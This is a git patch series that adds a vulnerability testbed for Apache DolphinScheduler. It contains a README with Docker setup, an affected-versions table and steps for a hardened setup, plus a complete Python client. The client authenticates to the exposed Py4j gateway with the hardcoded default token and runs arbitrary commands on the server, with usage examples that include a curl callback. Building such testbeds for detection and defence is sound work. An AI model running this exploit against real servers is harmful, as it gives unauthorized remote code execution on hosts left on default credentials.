From 343e25c8d608fa4e26136fb42905ea974f3c99da Mon Sep 17 00:00:00 2001 From: hayageek Date: Fri, 20 Feb 2026 18:21:42 +0530 Subject: [PATCH 1/4] new: dolphin scheduler exposed py4j gateway testbed --- apache/dolphin_scheduler/README.md | 46 ++++ .../dolphin_scheduler/py4j_gateway_client.py | 237 ++++++++++++++++++ 2 files changed, 283 insertions(+) create mode 100644 apache/dolphin_scheduler/README.md create mode 100644 apache/dolphin_scheduler/py4j_gateway_client.py diff --git a/apache/dolphin_scheduler/README.md b/apache/dolphin_scheduler/README.md new file mode 100644 index 00000000..f93ca597 --- /dev/null +++ b/apache/dolphin_scheduler/README.md @@ -0,0 +1,46 @@ +# Apache DolphinScheduler + +Follow these steps to set up a testbed for Apache DolphinScheduler: + +1. **Set the DolphinScheduler Version**: + For this setup, we're using version 3.1.5. + + ```bash + export DOLPHINSCHEDULER_VERSION=3.1.5 + ``` + +2. **Run DolphinScheduler Standalone**: + Run the following command to start the DolphinScheduler Standalone environment. + + ```bash + docker run --name dolphinscheduler-standalone-server -p 12345:12345 -p 25333:25333 -d apache/dolphinscheduler-standalone-server:"${DOLPHINSCHEDULER_VERSION}" + ``` + This setup makes the DolphinScheduler UI accessible at `http://localhost:12345/dolphinscheduler` and exposes the Py4j Gateway on port **25333**. + +# Steps to reproduce + +1. Execute the `py4j_gateway_client.py` script to perform RCE. No extra dependencies required (Python 3 standard library only). + +```bash +python3 py4j_gateway_client.py [command] +``` + +Usage examples: + +```bash +# Default: runs `id` +python3 py4j_gateway_client.py + +# Custom command +python3 py4j_gateway_client.py "whoami" + +# Curl +python3 py4j_gateway_client.py "curl CALLBACK_URL" + +# Override host/port/token +python3 py4j_gateway_client.py --host 127.0.0.1 --port 25333 "hostname" +``` + +#### How RCE executed ? + +The `py4j_gateway_client.py` script connects to the DolphinScheduler Java Gateway on port 25333 (Py4j protocol over TCP), authenticates with the default token, and sends Py4j protocol messages to invoke `Runtime.getRuntime().exec(command)` on the remote JVM. The command runs with the privileges of the DolphinScheduler process. Output is captured from the process stdout/stderr. diff --git a/apache/dolphin_scheduler/py4j_gateway_client.py b/apache/dolphin_scheduler/py4j_gateway_client.py new file mode 100644 index 00000000..e285412f --- /dev/null +++ b/apache/dolphin_scheduler/py4j_gateway_client.py @@ -0,0 +1,237 @@ +#!/usr/bin/env python3 +# Copyright 2025 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +""" +Minimal Py4j protocol client for authenticating with DolphinScheduler's Java Gateway +and executing commands on the remote JVM. + +No external dependencies required — uses only the Python standard library. +""" + +import socket +import sys + +AUTH_COMMAND = "A\n" +SUCCESS_PREFIX = "!y" +ERROR_PREFIX = "!x" +CALL_COMMAND = "c\n" +STATIC_PREFIX = "z:" +STRING_TYPE = "s" +REFERENCE_TYPE = "r" +END_COMMAND = "e\n" +RUNTIME_CLASS = "java.lang.Runtime" +SOCKET_TIMEOUT = 10.0 + + +def _escape(s): + return s.replace("\\", "\\\\").replace("\r", "\\r").replace("\n", "\\n") + + +def _unescape(s): + return s.replace("\\\\", "\x00").replace("\\n", "\n").replace("\\r", "\r").replace("\x00", "\\") + + +class Py4jGatewayClient: + def __init__(self, host, port, auth_token): + self.host = host + self.port = port + self.auth_token = auth_token + + def _connect(self): + """Create a socket and return (socket, rfile, wfile).""" + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(SOCKET_TIMEOUT) + sock.connect((self.host, self.port)) + rfile = sock.makefile("r", encoding="utf-8") + return sock, rfile + + def _send(self, sock, data): + sock.sendall(data.encode("utf-8")) + + def _readline(self, rfile): + line = rfile.readline() + if not line: + return None + return line.rstrip("\n") + + def _read_response(self, rfile): + """Parse a Py4j response. Returns the object ID (for references) or value string.""" + line = self._readline(rfile) + if line is None or line.startswith(ERROR_PREFIX): + return None + if line.startswith(SUCCESS_PREFIX) and len(line) > 2: + typ = line[2] + value = line[3:] + if typ == REFERENCE_TYPE: + return value + return value if value else None + return None + + def _read_string_response(self, rfile): + """Parse a Py4j response expecting a string value.""" + line = self._readline(rfile) + if line is None or line.startswith(ERROR_PREFIX): + return None + if line.startswith(SUCCESS_PREFIX) and len(line) > 2 and line[2] == "s": + return _unescape(line[3:]) + return None + + def _authenticate(self, sock, rfile): + self._send(sock, AUTH_COMMAND) + self._send(sock, self.auth_token + "\n") + line = self._readline(rfile) + return line is not None and line.startswith(SUCCESS_PREFIX) + + def authenticate(self): + """Test authentication against the gateway. Returns True on success.""" + try: + sock, rfile = self._connect() + try: + return self._authenticate(sock, rfile) + finally: + rfile.close() + sock.close() + except OSError as e: + print(f"Unable to connect to Java Gateway at {self.host}:{self.port}", file=sys.stderr) + return False + + def run_shell_script(self, script): + """Execute a command on the remote JVM. Returns True if successfully invoked.""" + if not script: + return False + try: + sock, rfile = self._connect() + try: + if not self._authenticate(sock, rfile): + return False + + # Runtime.getRuntime() + self._send(sock, CALL_COMMAND + STATIC_PREFIX + RUNTIME_CLASS + "\ngetRuntime\n" + END_COMMAND) + runtime_ref = self._read_response(rfile) + if runtime_ref is None: + return False + + # runtime.exec(script) + self._send(sock, CALL_COMMAND + runtime_ref + "\nexec\n" + STRING_TYPE + _escape(script) + "\n" + END_COMMAND) + return self._read_response(rfile) is not None + finally: + rfile.close() + sock.close() + except OSError: + return False + + def run_shell_script_with_output(self, script): + """Execute a command and return stdout+stderr by reading process streams.""" + if not script: + return None + try: + sock, rfile = self._connect() + try: + if not self._authenticate(sock, rfile): + return None + + # Runtime.getRuntime() + self._send(sock, CALL_COMMAND + STATIC_PREFIX + RUNTIME_CLASS + "\ngetRuntime\n" + END_COMMAND) + runtime_ref = self._read_response(rfile) + if runtime_ref is None: + return None + + # runtime.exec(script) + self._send(sock, CALL_COMMAND + runtime_ref + "\nexec\n" + STRING_TYPE + _escape(script) + "\n" + END_COMMAND) + process_ref = self._read_response(rfile) + if process_ref is None: + return None + + result = self._read_process_output(sock, rfile, process_ref) + + # exitValue() + self._send(sock, CALL_COMMAND + process_ref + "\nexitValue\n" + END_COMMAND) + self._read_response(rfile) + + return result + finally: + rfile.close() + sock.close() + except OSError: + return None + + def _read_stream_via_scanner(self, sock, rfile, stream_ref): + """Read all content from a stream using new Scanner(stream).useDelimiter("\\A").""" + # new Scanner(inputStream) + self._send(sock, "i\njava.util.Scanner\n" + REFERENCE_TYPE + stream_ref + "\n" + END_COMMAND) + scanner_ref = self._read_response(rfile) + if scanner_ref is None: + return None + + # scanner.useDelimiter("\\A") + self._send(sock, CALL_COMMAND + scanner_ref + "\nuseDelimiter\n" + STRING_TYPE + _escape("\\A") + "\n" + END_COMMAND) + self._read_response(rfile) + + # scanner.hasNext() + self._send(sock, CALL_COMMAND + scanner_ref + "\nhasNext\n" + END_COMMAND) + has_next_line = self._readline(rfile) + if has_next_line is None or has_next_line.startswith(ERROR_PREFIX): + return None + if has_next_line != "!ybtrue": + return "" + + # scanner.next() + self._send(sock, CALL_COMMAND + scanner_ref + "\nnext\n" + END_COMMAND) + return self._read_string_response(rfile) + + def _read_process_output(self, sock, rfile, process_ref): + """Read stdout and stderr from a Process reference.""" + # process.getInputStream() → stdout + self._send(sock, CALL_COMMAND + process_ref + "\ngetInputStream\n" + END_COMMAND) + stdout_ref = self._read_response(rfile) + stdout = self._read_stream_via_scanner(sock, rfile, stdout_ref) if stdout_ref else None + + # process.getErrorStream() → stderr + self._send(sock, CALL_COMMAND + process_ref + "\ngetErrorStream\n" + END_COMMAND) + stderr_ref = self._read_response(rfile) + stderr = self._read_stream_via_scanner(sock, rfile, stderr_ref) if stderr_ref else None + + parts = [] + if stdout: + parts.append(stdout) + if stderr: + parts.append(f"[stderr] {stderr}") + return "\n".join(parts) if parts else "" + + +if __name__ == "__main__": + import argparse + + parser = argparse.ArgumentParser(description="Py4j Gateway Client — execute commands on a remote JVM") + parser.add_argument("--host", default="127.0.0.1", help="Gateway host (default: 127.0.0.1)") + parser.add_argument("--port", type=int, default=25333, help="Gateway port (default: 25333)") + parser.add_argument("--token", default="jwUDzpLsNKEFER4*a8gruBH_GsAurNxU7A@Xc", help="Auth token") + parser.add_argument("command", nargs="?", default="id", help="Command to execute (default: id)") + args = parser.parse_args() + + client = Py4jGatewayClient(args.host, args.port, args.token) + + if not client.authenticate(): + print("Failed to authenticate with Java Gateway", file=sys.stderr) + sys.exit(1) + + output = client.run_shell_script_with_output(args.command) + if output is None: + print("Command failed (protocol error)", file=sys.stderr) + sys.exit(1) + elif output: + print(output) + else: + print("(empty output)", file=sys.stderr) From ddb3cc52499245ea8ed458efc2553d4ee81318ac Mon Sep 17 00:00:00 2001 From: hayageek Date: Thu, 26 Feb 2026 16:28:47 +0530 Subject: [PATCH 2/4] Added instructions to setup secure py4j --- apache/dolphin_scheduler/README.md | 16 +++++++++++++++- 1 file changed, 15 insertions(+), 1 deletion(-) diff --git a/apache/dolphin_scheduler/README.md b/apache/dolphin_scheduler/README.md index f93ca597..5db6fde8 100644 --- a/apache/dolphin_scheduler/README.md +++ b/apache/dolphin_scheduler/README.md @@ -13,7 +13,7 @@ Follow these steps to set up a testbed for Apache DolphinScheduler: Run the following command to start the DolphinScheduler Standalone environment. ```bash - docker run --name dolphinscheduler-standalone-server -p 12345:12345 -p 25333:25333 -d apache/dolphinscheduler-standalone-server:"${DOLPHINSCHEDULER_VERSION}" + docker run -p 12345:12345 -p 25333:25333 -d apache/dolphinscheduler-standalone-server:"${DOLPHINSCHEDULER_VERSION}" ``` This setup makes the DolphinScheduler UI accessible at `http://localhost:12345/dolphinscheduler` and exposes the Py4j Gateway on port **25333**. @@ -44,3 +44,17 @@ python3 py4j_gateway_client.py --host 127.0.0.1 --port 25333 "hostname" #### How RCE executed ? The `py4j_gateway_client.py` script connects to the DolphinScheduler Java Gateway on port 25333 (Py4j protocol over TCP), authenticates with the default token, and sends Py4j protocol messages to invoke `Runtime.getRuntime().exec(command)` on the remote JVM. The command runs with the privileges of the DolphinScheduler process. Output is captured from the process stdout/stderr. + + + +# Secure setup (non-default credentials): + +Below are the instructions to set up a secure Py4j gateway using a custom token and prevent unauthorized command execution. + + ```bash + export GATEWAY_TOKEN="your-secure-token-here" + ``` + + ```bash + docker run -p 12345:12345 -p 25333:25333 -e API_PYTHON_GATEWAY_AUTH_TOKEN="${GATEWAY_TOKEN}" -d apache/dolphinscheduler-standalone-server:"${DOLPHINSCHEDULER_VERSION}" + ``` From a8da02a67c03d23527cc5966cba26fe5787f6143 Mon Sep 17 00:00:00 2001 From: hayageek Date: Thu, 26 Feb 2026 23:06:56 +0530 Subject: [PATCH 3/4] Affected Versions added --- apache/dolphin_scheduler/README.md | 20 ++++++++++++++++++-- 1 file changed, 18 insertions(+), 2 deletions(-) diff --git a/apache/dolphin_scheduler/README.md b/apache/dolphin_scheduler/README.md index 5db6fde8..5ca6bf9f 100644 --- a/apache/dolphin_scheduler/README.md +++ b/apache/dolphin_scheduler/README.md @@ -3,12 +3,28 @@ Follow these steps to set up a testbed for Apache DolphinScheduler: 1. **Set the DolphinScheduler Version**: - For this setup, we're using version 3.1.5. + For this setup, we're using version 3.3.2. ```bash - export DOLPHINSCHEDULER_VERSION=3.1.5 + export DOLPHINSCHEDULER_VERSION=3.3.2 ``` +#### Affected Versions + +| Version | Release | Py4j Gateway Exploitable | +|---------------|-----------|--------------------------| +| 3.1.5 | ~4 years ago | Yes | +| 3.1.9 | ~2 years ago | Yes | +| 3.2.1 | ~2 years ago | Yes | +| 3.2.2 | >1 year ago | Yes | +| 3.3.0-alpha | 11 months ago | Yes | +| 3.3.1 | 6 months ago | Yes | +| 3.3.2 | 4 months ago | Yes | +| 3.4.0 | 1 month ago | No (gateway disabled by default) | + + + + 2. **Run DolphinScheduler Standalone**: Run the following command to start the DolphinScheduler Standalone environment. From 9638e38d3037e87cd14b079f3953a0f6dcb13912 Mon Sep 17 00:00:00 2001 From: hayageek Date: Fri, 27 Feb 2026 14:30:23 +0530 Subject: [PATCH 4/4] Release dates added --- apache/dolphin_scheduler/README.md | 18 +++++++++--------- 1 file changed, 9 insertions(+), 9 deletions(-) diff --git a/apache/dolphin_scheduler/README.md b/apache/dolphin_scheduler/README.md index 5ca6bf9f..f7c634da 100644 --- a/apache/dolphin_scheduler/README.md +++ b/apache/dolphin_scheduler/README.md @@ -11,16 +11,16 @@ Follow these steps to set up a testbed for Apache DolphinScheduler: #### Affected Versions -| Version | Release | Py4j Gateway Exploitable | +| Version | Release Date | Py4j Gateway Exploitable | |---------------|-----------|--------------------------| -| 3.1.5 | ~4 years ago | Yes | -| 3.1.9 | ~2 years ago | Yes | -| 3.2.1 | ~2 years ago | Yes | -| 3.2.2 | >1 year ago | Yes | -| 3.3.0-alpha | 11 months ago | Yes | -| 3.3.1 | 6 months ago | Yes | -| 3.3.2 | 4 months ago | Yes | -| 3.4.0 | 1 month ago | No (gateway disabled by default) | +| 3.1.5 | Apr 3, 2023 | Yes | +| 3.1.9 | Dec 22, 2023 | Yes | +| 3.2.1 | Feb 7, 2024 | Yes | +| 3.2.2 | Jul 18, 2024 | Yes | +| 3.3.0-alpha | Apr 8, 2025 | Yes | +| 3.3.1 | Aug 25, 2025 | Yes | +| 3.3.2 | Oct 26, 2025 | Yes | +| 3.4.0 | Jan 20, 2026 | No (gateway disabled by default) |